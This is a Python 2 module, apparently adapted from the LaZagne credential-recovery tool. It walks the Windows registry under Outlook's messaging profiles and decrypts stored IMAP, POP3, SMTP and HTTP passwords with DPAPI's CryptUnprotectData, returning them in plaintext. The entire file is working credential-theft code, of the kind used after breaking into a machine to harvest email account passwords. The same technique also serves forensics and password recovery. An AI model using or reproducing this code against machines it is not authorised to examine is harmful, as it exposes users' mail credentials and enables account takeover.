# Inspired from https://github.com/AlessandroZ/LaZagne import win32api, win32con, win32crypt class Outlook(): def __init__(self): options = {'command': '-o', 'action': 'store_true', 'dest': 'outlook', 'help': 'outlook - IMAP, POP3, HTTP, SMTP, LDPAP (not Exchange)'} def run(self): accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook' try: hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead) except Exception, e: return num = win32api.RegQueryInfoKey(hkey)[0] pwdFound = [] for x in range(0, num): name = win32api.RegEnumKey(hkey, x) skey = win32api.RegOpenKey(hkey, name, 0, accessRead) num_skey = win32api.RegQueryInfoKey(skey)[0] if num_skey != 0: for y in range(0, num_skey): name_skey = win32api.RegEnumKey(skey, y) sskey = win32api.RegOpenKey(skey, name_skey, 0, accessRead) num_sskey = win32api.RegQueryInfoKey(sskey)[1] for z in range(0, num_sskey): k = win32api.RegEnumValue(sskey, z) if 'password' in k[0].lower(): values = self.retrieve_info(sskey, name_skey) # write credentials into a text file if len(values) != 0: pwdFound.append(values) # print the results return pwdFound def retrieve_info(self, hkey, name_key): values = {} num = win32api.RegQueryInfoKey(hkey)[1] for x in range(0, num): k = win32api.RegEnumValue(hkey, x) if 'password' in k[0].lower(): try: password = win32crypt.CryptUnprotectData(k[1][1:], None, None, None, 0)[1] values[k[0]] = password.decode('utf16') except Exception, e: values[k[0]] = 'N/A' else: try: values[k[0]] = str(k[1]).decode('utf16') except: values[k[0]] = str(k[1]) return values